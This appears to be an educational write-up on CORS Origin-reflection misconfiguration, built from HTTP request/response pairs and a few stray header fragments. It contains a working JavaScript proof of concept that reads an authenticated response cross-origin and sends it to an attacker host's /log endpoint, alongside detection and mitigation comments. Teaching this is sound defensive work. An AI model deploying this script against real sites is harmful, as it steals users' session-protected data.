Origin reflection: the server copies the request's Origin header into Access-Control-Allow-Origin without validating it
GET /sensitivedata HTTP/1.1
Host: vuln.feifei.tw
Origin: https://malicious.feifei.com.tw
Cookie: sessionid=...
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://malicious.feifei.com.tw
Access-Control-Allow-Credentials: true
...
https://malicious.feifei.com.tw
sessionid
GET /sensitivedata HTTP/1.1
Host: vuln.feifei.tw
Origin: https://malicious1.feifei.com.tw
Cookie: sessionid=...
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://malicious1.feifei.com.tw
Access-Control-Allow-Credentials: true
...
Access-Control-Allow-Origin
// Cross-origin read that the misconfigured responses above make possible.
// The request is issued from a page on the attacker-controlled origin; the
// browser only lets that page read the response because the server answers
// with the reflected Origin in Access-Control-Allow-Origin *and*
// Access-Control-Allow-Credentials: true. Either header alone would not be
// enough: without the reflected origin the response is opaque, and with a
// wildcard "*" the browser refuses to combine it with credentials.
var req = new XMLHttpRequest();
req.onload = reqListener;
// Same path and host as the request/response pairs shown above.
req.open('get','https://vuln.feifei.tw/sensitivedata',true);
// Attaches the victim's cookies (the Cookie: sessionid=... line above), so
// the server returns the authenticated user's data rather than a login page.
req.withCredentials = true;
req.send();
function reqListener() {
// Once the response is readable cross-origin, its body can leave the victim's
// browser in a single navigation; on the server side this shows up as an
// authenticated GET to /sensitivedata with an Origin header that is not one
// of your own sites — a useful detection signal in access logs.
// Mitigation: compare Origin against an explicit allowlist of exact origins
// and echo back only a matching value; never reflect arbitrary origins, never
// allowlist the literal string "null", and never pair
// Access-Control-Allow-Credentials: true with a reflected or wildcard origin.
location='//malicious.feifei.com.tw/log?key='+this.responseText;
};
Access-Control-Allow-Origin: null
*
Access-Control-Allow-Origin